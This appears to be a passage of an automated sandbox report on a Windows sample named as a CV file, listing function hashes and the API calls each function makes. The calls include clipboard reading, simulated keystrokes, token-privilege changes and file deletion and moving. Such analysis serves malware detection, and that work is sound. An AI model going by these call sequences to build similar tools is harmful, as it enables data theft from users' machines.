                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: d8907b71215a77578586c1712493d0f42d78ad555bd842ada0617edc9faf75c9
                                                                                        • Instruction ID: 0553d466d595ead718e13a54f10767b07b3a49c24a22e506488a1eee11b64118
                                                                                        • Opcode Fuzzy Hash: d8907b71215a77578586c1712493d0f42d78ad555bd842ada0617edc9faf75c9
                                                                                        • Instruction Fuzzy Hash: 2A213970508701CFDB2ADF64C444B2ABBE1BF85304F26896CE69A4B661C732E845DF92
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 003AAFC0
                                                                                          • Part of subcall function 003A7BDA: __getptd_noexit.LIBCMT ref: 003A7BDA
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1144279405-0
                                                                                        • Opcode ID: 58262ce35960507b9189eb05495f243397f249436508164c994d2b0482c05dd1
                                                                                        • Instruction ID: bde9131a9630c66f11634ba43380c28e273b8518aaf6428ef23546543a92e327
                                                                                        • Opcode Fuzzy Hash: 58262ce35960507b9189eb05495f243397f249436508164c994d2b0482c05dd1
                                                                                        • Instruction Fuzzy Hash: 11118FB28096409FD717AFA49C4275ABA60EF43331F2A4350E5741F1E3CBB48D119BA6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                        • Instruction ID: 30ee31ee320e1548830de6836e8f715fcdfeb4b9bb1438320556cf6ce595d6b5
                                                                                        • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                        • Instruction Fuzzy Hash: A201863150020EEECF06FF64C8918FEBB78EF10304F108069B51597195EA309A49CB60
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 003A2AED
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        • Opcode ID: cbb9155e22215624a068d67c6a87113bf87137b4cc9d05c21fa0809fcd314cf2
                                                                                        • Instruction ID: 5ca3e019bd1c0bd1d6f09fd71c011deaf707d36bde665cfae5b3d1358c3a1451
                                                                                        • Opcode Fuzzy Hash: cbb9155e22215624a068d67c6a87113bf87137b4cc9d05c21fa0809fcd314cf2
                                                                                        • Instruction Fuzzy Hash: AFF06231900215ABDF23AF6D8C0679F76A5FF42320F1A8415B8149E191DB788A52DB51
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,003839FE,?,00000001), ref: 00384286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: f091bf8750a02df5b40037c7461b3d3f5c0b510820732a1f86422aec8cef4ae3
                                                                                        • Instruction ID: e7eba87db5e76146cc51c948441b02035bf5a773e755fe7d7a3a3ce32f1ddfd9
                                                                                        • Opcode Fuzzy Hash: f091bf8750a02df5b40037c7461b3d3f5c0b510820732a1f86422aec8cef4ae3
                                                                                        • Instruction Fuzzy Hash: 44F03971909702CFCB36AF64D890816BBF4BF053253258EBEF1D686A10C7329844DF50
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003840C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 82841172-0
                                                                                        • Opcode ID: 060c0dd11b05431a0ee38ed3c3af6a95941cbdb3f37dbadd9f52ccfaeb416ee0
                                                                                        • Instruction ID: 5facd2dd54b735a54558eb975762fe1bcf209a29194e22153c84abc043f55768
                                                                                        • Opcode Fuzzy Hash: 060c0dd11b05431a0ee38ed3c3af6a95941cbdb3f37dbadd9f52ccfaeb416ee0
                                                                                        • Instruction Fuzzy Hash: DDE0CD765002245FC712A694CC46FEA779DDF88690F0501B5F905EB244DD74D9819690
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 019FC2A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                        • Instruction ID: b82be7cdfb7411e1edacea55c657b0a5c725232446cf066a4415e542b4bd619d
                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                        • Instruction Fuzzy Hash: 07E09A7594010EAFDB00DFA4D5496EE7BB4EF04312F1045A5FD0596680DA309A548A62
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 019FC2A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction ID: 253accc44a336b716e75a023137231c37510ff18d90a0f1182cd69f7d473e84d
                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction Fuzzy Hash: D2E0E67594010EEFDB00DFF4D5496EE7BB4EF04312F104165FD05D2280D6309D508A62
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 003EF87D
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003EF8DC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003EF919
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003EF940
                                                                                        • SendMessageW.USER32 ref: 003EF966
                                                                                        • _wcsncpy.LIBCMT ref: 003EF9D2
                                                                                        • GetKeyState.USER32(00000011), ref: 003EF9F3
                                                                                        • GetKeyState.USER32(00000009), ref: 003EFA00
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003EFA16
                                                                                        • GetKeyState.USER32(00000010), ref: 003EFA20
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003EFA4F
                                                                                        • SendMessageW.USER32 ref: 003EFA72
                                                                                        • SendMessageW.USER32(?,00001030,?,003EE059), ref: 003EFB6F
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 003EFB85
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003EFB96
                                                                                        • SetCapture.USER32(?), ref: 003EFB9F
                                                                                        • ClientToScreen.USER32(?,?), ref: 003EFC03
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003EFC0F
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 003EFC29
                                                                                        • ReleaseCapture.USER32 ref: 003EFC34
                                                                                        • GetCursorPos.USER32(?), ref: 003EFC69
                                                                                        • ScreenToClient.USER32(?,?), ref: 003EFC76
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003EFCD8
                                                                                        • SendMessageW.USER32 ref: 003EFD02
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003EFD41
                                                                                        • SendMessageW.USER32 ref: 003EFD6C
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003EFD84
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003EFD8F
                                                                                        • GetCursorPos.USER32(?), ref: 003EFDB0
                                                                                        • ScreenToClient.USER32(?,?), ref: 003EFDBD
                                                                                        • GetParent.USER32(?), ref: 003EFDD9
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003EFE3F
                                                                                        • SendMessageW.USER32 ref: 003EFE6F
                                                                                        • ClientToScreen.USER32(?,?), ref: 003EFEC5
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003EFEF1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003EFF19
                                                                                        • SendMessageW.USER32 ref: 003EFF3C
                                                                                        • ClientToScreen.USER32(?,?), ref: 003EFF86
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003EFFB6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003F004B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F
                                                                                        • API String ID: 2516578528-4164748364
                                                                                        • Opcode ID: a669de814ce3083a4d44a17f91ee8885868d01925c898adf641b187d3346f87f
                                                                                        • Instruction ID: 91a97957694beb5d6ccd15cdd84e997d7fff6c225fbde5958f5138595a0e46e1
                                                                                        • Opcode Fuzzy Hash: a669de814ce3083a4d44a17f91ee8885868d01925c898adf641b187d3346f87f
                                                                                        • Instruction Fuzzy Hash: F332DD746002A5AFDB12CF64C880BAABBA8FF49344F054A39F695872F1C7B1EC44CB51
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 003EB1CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: %d/%02d/%02d
                                                                                        • API String ID: 3850602802-328681919
                                                                                        • Opcode ID: 6c8f71a024dc0ac18d5144c79c75af76bfb6849d2bd7a0d15f469b54c38007af
                                                                                        • Instruction ID: dff4cf8f4fcb74aeb6037153696c01f99e00aa0bb57324941a117386a1672406
                                                                                        • Opcode Fuzzy Hash: 6c8f71a024dc0ac18d5144c79c75af76bfb6849d2bd7a0d15f469b54c38007af
                                                                                        • Instruction Fuzzy Hash: 9812E271500268ABEB269F66CD49FAFBBB8FF45720F104229F915EB2D1DB709901CB11
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0039EB4A
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003F3AEA
                                                                                        • IsIconic.USER32(000000FF), ref: 003F3AF3
                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 003F3B00
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 003F3B0A
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003F3B20
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003F3B27
                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003F3B33
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003F3B44
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003F3B4C
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 003F3B54
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 003F3B57
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003F3B6C
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 003F3B77
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003F3B81
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 003F3B86
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003F3B8F
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 003F3B94
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 003F3B9E
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 003F3BA3
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 003F3BA6
                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 003F3BCD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        • Opcode ID: d0c9ea5657279855063dcabb43593a12f81082275baa22dc4ac77368506bc948
                                                                                        • Instruction ID: a9eceab128fdbe9915952841cf26a3ca55338c73c350e98c67ddc9b9b78ec8d1
                                                                                        • Opcode Fuzzy Hash: d0c9ea5657279855063dcabb43593a12f81082275baa22dc4ac77368506bc948
                                                                                        • Instruction Fuzzy Hash: 3E317071E4021CBFEB216BA58D4AF7F7E6CEB44B50F114025FB05FA1D0DAB19D00AAA4
                                                                                        APIs
                                                                                          • Part of subcall function 003BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003BB180
                                                                                          • Part of subcall function 003BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003BB1AD
                                                                                          • Part of subcall function 003BB134: GetLastError.KERNEL32 ref: 003BB1BA
                                                                                        • _memset.LIBCMT ref: 003BAD08
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003BAD5A
                                                                                        • CloseHandle.KERNEL32(?), ref: 003BAD6B
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003BAD82
                                                                                        • GetProcessWindowStation.USER32 ref: 003BAD9B
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 003BADA5
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003BADBF
                                                                                          • Part of subcall function 003BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003BACC0), ref: 003BAB99
                                                                                          • Part of subcall function 003BAB84: CloseHandle.KERNEL32(?,?,003BACC0), ref: 003BABAB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $H*C$default$winsta0
                                                                                        • API String ID: 2063423040-1562247724
                                                                                        • Opcode ID: 997a87125b778a6368bddaec739185f077fc1d12772fbce168dbacbac253b82f
                                                                                        • Instruction ID: d39d8747c2839865def5c987afca36545d4d35213c9459d91745af3f671168e1
                                                                                        • Opcode Fuzzy Hash: 997a87125b778a6368bddaec739185f077fc1d12772fbce168dbacbac253b82f
                                                                                        • Instruction Fuzzy Hash: 73819F71C00A09AFEF12DFA4CD45AEEBB78EF08348F054129FA14B6561D7728E44DB61
                                                                                        APIs
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C5FA6,?), ref: 003C6ED8
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C5FA6,?), ref: 003C6EF1
                                                                                          • Part of subcall function 003C725E: __wsplitpath.LIBCMT ref: 003C727B
                                                                                          • Part of subcall function 003C725E: __wsplitpath.LIBCMT ref: 003C728E
                                                                                          • Part of subcall function 003C72CB: GetFileAttributesW.KERNEL32(?,003C6019), ref: 003C72CC
                                                                                        • _wcscat.LIBCMT ref: 003C6149
                                                                                        • _wcscat.LIBCMT ref: 003C6167
                                                                                        • __wsplitpath.LIBCMT ref: 003C618E
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003C61A4
                                                                                        • _wcscpy.LIBCMT ref: 003C6209
                                                                                        • _wcscat.LIBCMT ref: 003C621C
                                                                                        • _wcscat.LIBCMT ref: 003C622F
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 003C625D
                                                                                        • DeleteFileW.KERNEL32(?), ref: 003C626E
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 003C6289
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 003C6298
                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 003C62AD
                                                                                        • DeleteFileW.KERNEL32(?), ref: 003C62BE
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003C62E1
                                                                                        • FindClose.KERNEL32(00000000), ref: 003C62FD
                                                                                        • FindClose.KERNEL32(00000000), ref: 003C630B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1917200108-1173974218
                                                                                        • Opcode ID: fc6e4e1d84a4dbe82e6c1ad6ca773f534bb2985b3434af49721a4199cbc45eac
                                                                                        • Instruction ID: 404699415b0612aa8baa33fe48e31c1fe601c4c2030f34383b939956803dab67
                                                                                        • Opcode Fuzzy Hash: fc6e4e1d84a4dbe82e6c1ad6ca773f534bb2985b3434af49721a4199cbc45eac
                                                                                        • Instruction Fuzzy Hash: 28511072C0811C6ACB22EB91CD45EEB77BCAF05300F0905EAE585E6141DE369B49CFA8
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(0041DC00), ref: 003D6B36
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 003D6B44
                                                                                        • GetClipboardData.USER32(0000000D), ref: 003D6B4C
                                                                                        • CloseClipboard.USER32 ref: 003D6B58
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003D6B74
                                                                                        • CloseClipboard.USER32 ref: 003D6B7E
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003D6B93
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 003D6BA0
                                                                                        • GetClipboardData.USER32(00000001), ref: 003D6BA8
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003D6BB5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003D6BE9
                                                                                        • CloseClipboard.USER32 ref: 003D6CF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                        • String ID:
                                                                                        • API String ID: 3222323430-0
                                                                                        • Opcode ID: af54c6f0186c896ebff871bd56bfb064d8b871e71332a59dd26994dbfd672d00
                                                                                        • Instruction ID: 15c4d69f7aba6012770ae0d174e07f11a2ce44e312098b13b30177a4c055bda5
                                                                                        • Opcode Fuzzy Hash: af54c6f0186c896ebff871bd56bfb064d8b871e71332a59dd26994dbfd672d00
                                                                                        • Instruction Fuzzy Hash: 0B518172604301ABD302BFA1DD96F6E77A8AF84B10F00042EF556EB2D1DF70D9098B66
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003CF62B
                                                                                        • FindClose.KERNEL32(00000000), ref: 003CF67F
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CF6A4
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003CF6BB
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 003CF6E2
                                                                                        • __swprintf.LIBCMT ref: 003CF72E
